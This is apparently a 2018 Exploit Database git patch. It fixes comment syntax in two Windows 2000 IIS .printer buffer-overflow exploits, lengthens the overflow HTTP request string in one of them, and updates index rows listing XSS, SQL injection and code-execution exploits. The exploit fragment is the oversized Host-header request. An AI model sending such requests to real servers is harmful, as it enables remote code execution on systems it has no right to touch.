From 9bd9fb0da3e7ea40cb9a948aa8c9a45d2aa750ff Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 11 Dec 2018 05:01:44 +0000 Subject: [PATCH] DB: 2018-12-11 2 changes to exploits/shellcodes Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting --- exploits/windows/remote/20816.c | 1 + exploits/windows/remote/20817.c | 6 +++--- files_exploits.csv | 4 ++-- 3 files changed, 6 insertions(+), 5 deletions(-) diff --git a/exploits/windows/remote/20816.c b/exploits/windows/remote/20816.c index 5a6d162fd..05241332a 100644 --- a/exploits/windows/remote/20816.c +++ b/exploits/windows/remote/20816.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. diff --git a/exploits/windows/remote/20817.c b/exploits/windows/remote/20817.c index 9d76851d4..f555645dd 100644 --- a/exploits/windows/remote/20817.c +++ b/exploits/windows/remote/20817.c @@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. +*/ /* Author: styx^ @@ -268,9 +270,7 @@ void scan(char *ip) { int result(int sock) { - char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n"; + char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n"; char buf[1024]; int i = 0; diff --git a/files_exploits.csv b/files_exploits.csv index 163a32885..ecfd4868c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40456,5 +40456,5 @@ id,file,description,date,author,type,platform,port 45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80 45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80 45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php, -45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php, -45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php, +45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80 +45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,80